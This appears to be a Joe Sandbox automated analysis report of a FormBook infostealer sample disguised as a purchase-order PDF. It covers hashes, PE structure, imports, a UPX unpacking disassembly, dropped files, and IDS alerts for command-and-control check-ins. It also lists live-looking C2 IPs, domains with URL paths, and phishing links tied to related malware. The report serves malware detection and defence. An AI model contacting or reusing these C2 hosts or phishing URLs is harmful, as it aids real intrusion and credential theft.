81.88.63.46 | www.2bhp.com | Italy | 39729 | REGISTER-ASIT | true
3.33.130.190 | linkwave.cloud | United States | 8987 | AMAZONEXPANSIONGB | true
85.153.138.113 | www.mfgarage.net | Turkey | 12946 | TELECABLESpainES | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519457
Start date and time: 2024-09-26 15:21:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO-78140924.BAT.PDF.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/4@11/8
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 82%
                                              • Number of executed functions: 92
                                              • Number of non-executed functions: 330
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: PO-78140924.BAT.PDF.exe
Time | Type | Description
09:22:48 | API Interceptor | 7311144x Sleep call for process: mstsc.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
67.223.117.189 | rP0n___87004354.exe | malicious | FormBook | www.heldhold.xyz/fava/
67.223.117.189 | Enquiry.exe | malicious | FormBook | www.uburn.xyz/iqqs/
67.223.117.189 | AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | www.uburn.xyz/unks/
67.223.117.189 | ncOLm62YLB.exe | malicious | FormBook | www.uburn.xyz/unks/
67.223.117.189 | DOC092024-0431202229487.exe | malicious | FormBook | www.heldhold.xyz/fava/
67.223.117.189 | LisectAVT_2403002B_466.exe | malicious | FormBook | www.techstone.top/d5fo/
67.223.117.189 | Shipping Documents 7896424100.exe | malicious | FormBook | www.nodedev.top/wnsq/
67.223.117.189 | ORDEN_240715189833.IMG | malicious | DarkTortilla, FormBook | www.akissdove.xyz/8ntn/
67.223.117.189 | OrderPI.exe | malicious | FormBook | www.helidove.xyz/no40/
67.223.117.189 | PRE-ALERT HTHC22031529.exe | malicious | FormBook | www.nodedev.top/wnsq/
172.96.187.60 | rP0n___87004354.exe | malicious | FormBook | www.dalong.site/v2c3/
172.96.187.60 | DOC092024-0431202229487.exe | malicious | FormBook | www.dalong.site/v2c3/
172.96.187.60 | xU0wdBC6XWRZ6UY.exe | malicious | FormBook, PureLog Stealer | www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==
103.248.137.209 | rP0n___87004354.exe | malicious | FormBook | www.63582.photo/5o7d/
172.67.165.25 | Payment Advise-PDF.exe | malicious | FormBook | www.b5x7vk.agency/3rsv/
217.70.184.50 | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.turbonotes.app/yvck/
217.70.184.50 | CITA#U00c7#U00c3O.exe | malicious | FormBook | www.languagemodel.pro/nxfn/
217.70.184.50 | rP0n___87004354.exe | malicious | FormBook | www.ultraleap.net/8pln/
217.70.184.50 | CYTAT.exe | malicious | FormBook | www.languagemodel.pro/nxfn/
217.70.184.50 | Cotizaci#U00f3n.exe | malicious | FormBook | www.languagemodel.pro/nxfn/
217.70.184.50 | ES-241-29335_pdf.exe | malicious | FormBook | www.offkase.org/vkr8/
217.70.184.50 | RECIEPT.PDF.exe | malicious | FormBook | www.ultraleap.net/hwgh/
217.70.184.50 | PO# Q919240.exe | malicious | FormBook | www.languagemodel.pro/nxfn/
217.70.184.50 | PO098765678.exe | malicious | FormBook | www.ultraleap.net/4qqr/
217.70.184.50 | PAGO $830.900.exe | malicious | FormBook | www.languagemodel.pro/nxfn/

Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
www.heldhold.xyz | rP0n___87004354.exe | malicious | FormBook | 67.223.117.189
www.heldhold.xyz | DOC092024-0431202229487.exe | malicious | FormBook | 67.223.117.189
webredir.vip.gandi.net | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | CITA#U00c7#U00c3O.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | rP0n___87004354.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | CYTAT.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | Cotizaci#U00f3n.exe | malicious | FormBook | 217.70.184.50
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              www.2bhp.comrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              azkwupgf.as66588.comRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 103.248.137.209
                                              inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              www.b5x7vk.agencyrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.11.31
                                              Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.165.25
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.11.31
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SINGLEHOP-LLCUSRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 67.212.175.162
                                              https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                              • 198.91.81.14
                                              http://dev-265334124785.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://dev-gdtf.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/onu2r0/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/v99361/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 172.96.187.60
                                              http://www.rb.gy/yfdl7y/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/h66x7g/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/6ucw3c/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              CLOUDFLARENETUSNVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.181.150
                                              https://www.google.co.uk/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.us.m.mimecastprotect.com/s/n0rICERpMNsxN8vRCNfXC76qeb?domain=sharedocx.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                              • 104.21.67.246
                                              TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                              • 104.21.67.246
                                              purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                              • 172.66.0.235
                                              https://www.google.to/url?url=https://bxaxlsoggszcwwbz&nzc=vvjpqcc&suvkdk=cmz&kwdec=vutety&cbb=sslsceg&pagnn=fuhmpw&dkqf=mwwhastk&ffmvozjupo=yqbyougxxo&q=amp/gm5bqhj.g%C2%ADb%C2%ADe%C2%ADym%C2%ADw%C2%ADc%C2%ADg%C2%ADv%C2%ADk%C2%ADb%C2%ADd%C2%ADevll.com%E2%80%8B/cbvogermm&clnw=xokmakg&dhxrdhh=zgwr&tievm=savxww&gfpizxn=fnvGet hashmaliciousHTMLPhisherBrowse
                                              • 104.21.235.70
                                              http://erptanacsadas.hu.pages.services/secure-business-document/?ts=1726767567620Get hashmaliciousHtmlDropperBrowse
                                              • 188.114.96.3
                                              https://forms.office.com/e/jUjy5zj0tMGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              You have a held messages (dawie@ddebeer.co.za).msgGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              DNC-ASDimensionNetworkCommunicationLimitedHKRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 103.248.137.209
                                              inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 147.92.36.247
                                              http://oveman-austral.com/Get hashmaliciousUnknownBrowse
                                              • 147.92.44.231
                                              PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 147.92.35.81
                                              a82WdwCQnQOQf4b.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.35.81
                                              VIMRO-AS15189USrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.118.13
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 67.223.118.13
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 67.223.119.7
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 67.223.119.7
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\mstsc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.121297215059106
                                              Encrypted:false
                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Process:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):50462
                                              Entropy (8bit):7.805523402671471
                                              Encrypted:false
                                              SSDEEP:1536:f7wfc8mmeqwfeVJ2Nn2ksyh3bu54d7SqE474:Dw6meqwf8C2ZyZyk7SqEW4
                                              MD5:7768F7B04100EAF3C76E855072EC1E82
                                              SHA1:B70FF99A2EFEDE8186A1C494254E9082AB0E43FD
                                              SHA-256:1DD577EFA154150DDDCF6B3F7735676736B15963526E6DBB420029C539ADEC5D
                                              SHA-512:1BBD4BD0C2C64091D89D4B0EF0483776ECD6B3CC590F2B4FD571B5338BB926DE858E409676B23674A074BA48ED585D72667A3868EC7B8F1374EE885D7C7555E4
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              File Type:ASCII text, with very long lines (57348), with no line terminators
                                              Category:dropped
                                              Size (bytes):57348
                                              Entropy (8bit):5.7440570198461565
                                              Encrypted:false
                                              SSDEEP:1536:3npJpjLot+QAJVY69Jgl/pngvMhe28yJsSIRVQ5:Zzjsd6YnYMj8pfQ5
                                              MD5:B1A3D2BCD7A9848331D880A404EA8CCE
                                              SHA1:7F6969BE160DDD7429BC72413632386498DC5BE7
                                              SHA-256:05E8D8794663862FF93096094430B47E4959EF7B557A4DDC82089AFC5C2D5A07
                                              SHA-512:F9F9F9E6E0096FC99B8EE0D32E744A0076217E4223B94A2D14E601CFC195FD4210D6B48B73E9798FD9DE0461446E8BA88D4EC01C87136E5AEBCEFED4947151F5
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):287744
                                              Entropy (8bit):7.994345059857177
                                              Encrypted:true
                                              SSDEEP:6144:CUxp9CNCkox3ARd/Ks3/fd7UnxqOLC3eKNjCdOxHu05puYPYdyc:Ci9Cqx3WRd7UrC/Nu4xHf4
                                              MD5:FDDBC447FB03CC8DAC81845B7B0D73C6
                                              SHA1:B93CD7384925ECD13A0D451D893517672BEA1594
                                              SHA-256:ED3F219497FCBBC69987E31549D460E1FF4A6114391A12A7090BB0CACB52A0F2
                                              SHA-512:E5A0DCE53ADB335ECA2B172EB39A591AE20AFE449BBFF8ABE8321215BB25CEE2DA84D9BA042E68E0EC67FFEFCA279A85798ACBA4F2958DBABDD060D22402E34F
                                              Malicious:false
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                              Entropy (8bit):7.975429925599898
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.39%
                                              • UPX compressed Win32 Executable (30571/9) 0.30%
                                              • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              File name:PO-78140924.BAT.PDF.exe
                                              File size:1'085'440 bytes
                                              MD5:0c3d90f3a7607383e1e4a5da779b23f2
                                              SHA1:bf3452b178fe50a53d94498cd2efc777c993954b
                                              SHA256:4b3d9e2b4d5af94fe3953942fe920f42c3928a7c4c9d5ccd841bd1fac367690e
                                              SHA512:0227db6226986894591497b2ea75411dd198a06a6370c2902e6901813088b6fe1e279e8f64233663daf89660a8eaedf3ef95ba4d2a910dacaff54fd6c1dbbc9f
                                              SSDEEP:24576:r4GHnhIzOaWz4cTAKcvr2Nt0GUirujvK61BRM7KU:Ushdau/Srw/FKSar
                                              TLSH:2B3523E9E081D467E1B927B088764C991E247836ED947F0BD782E24EFD18347C637A2D
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                              Icon Hash:aaf3e3e3938382a0
                                              Entrypoint:0x58aac0
                                              Entrypoint Section:UPX1
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66F1251F [Mon Sep 23 08:21:51 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:fc6683d30d9f25244a50fd5357825e79
                                              Instruction
                                              pushad
                                              mov esi, 00535000h
                                              lea edi, dword ptr [esi-00134000h]
                                              push edi
                                              jmp 00007F6FD8E075ADh
                                              nop
                                              mov al, byte ptr [esi]
                                              inc esi
                                              mov byte ptr [edi], al
                                              inc edi
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E0758Fh
                                              mov eax, 00000001h
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc eax, eax
                                              add ebx, ebx
                                              jnc 00007F6FD8E075ADh
                                              jne 00007F6FD8E075CAh
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E075C1h
                                              dec eax
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc eax, eax
                                              jmp 00007F6FD8E07576h
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc ecx, ecx
                                              jmp 00007F6FD8E075F4h
                                              xor ecx, ecx
                                              sub eax, 03h
                                              jc 00007F6FD8E075B3h
                                              shl eax, 08h
                                              mov al, byte ptr [esi]
                                              inc esi
                                              xor eax, FFFFFFFFh
                                              je 00007F6FD8E07617h
                                              sar eax, 1
                                              mov ebp, eax
                                              jmp 00007F6FD8E075ADh
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E0756Eh
                                              inc ecx
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E07560h
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc ecx, ecx
                                              add ebx, ebx
                                              jnc 00007F6FD8E07591h
                                              jne 00007F6FD8E075ABh
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jnc 00007F6FD8E07586h
                                              add ecx, 02h
                                              cmp ebp, FFFFFB00h
                                              adc ecx, 02h
                                              lea edx, dword ptr [edi+ebp]
                                              cmp ebp, FFFFFFFCh
                                              jbe 00007F6FD8E075B0h
                                              mov al, byte ptr [edx]
                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD5 build 40629
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD5 build 40629
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x23d8a8        | 0x424        | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x18b000        | 0xb28a8      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x23dccc        | 0xc          | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x18aca4        | 0x48         | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x134000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x135000 | 0x56000 | 0x55e00 | 2a390bc407fcab5ebe5211f8bcc0798d | False | 0.9873970842430859 | data | 7.936151989520538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x18b000 | 0xb3000 | 0xb2e00 | 3113ea4e97a194f1d71fdd71bbe7b97d | False | 0.9715902886967156 | data | 7.975752898020827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x18b5ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x18b6d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x18b804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x18b930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x18bc1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x18bd48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x18cbf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x18d4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x18da0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x18ffb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x191064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xcd4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcda84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xce110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xce5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xceb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xcf1f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xcf660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x1914d0 | 0xabe3f | data | | | 1.0003138923647457
RT_GROUP_ICON | 0x23d314 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x23d390 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x23d3a8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x23d3c0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x23d3d8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x23d4b8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetOpenFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T15:22:25.684016+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49709 | 81.88.63.46 | 80 | TCP
2024-09-26T15:22:25.684016+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49709 | 81.88.63.46 | 80 | TCP
2024-09-26T15:22:41.399078+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49710 | 217.70.184.50 | 80 | TCP
2024-09-26T15:22:43.918437+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49711 | 217.70.184.50 | 80 | TCP
2024-09-26T15:22:46.510005+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49712 | 217.70.184.50 | 80 | TCP
2024-09-26T15:22:49.195322+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49713 | 217.70.184.50 | 80 | TCP
2024-09-26T15:22:49.195322+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49713 | 217.70.184.50 | 80 | TCP
2024-09-26T15:22:54.968757+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49714 | 172.96.187.60 | 80 | TCP
2024-09-26T15:22:57.503736+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49716 | 172.96.187.60 | 80 | TCP
2024-09-26T15:23:00.059704+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49717 | 172.96.187.60 | 80 | TCP
2024-09-26T15:23:02.624619+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49718 | 172.96.187.60 | 80 | TCP
2024-09-26T15:23:02.624619+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49718 | 172.96.187.60 | 80 | TCP
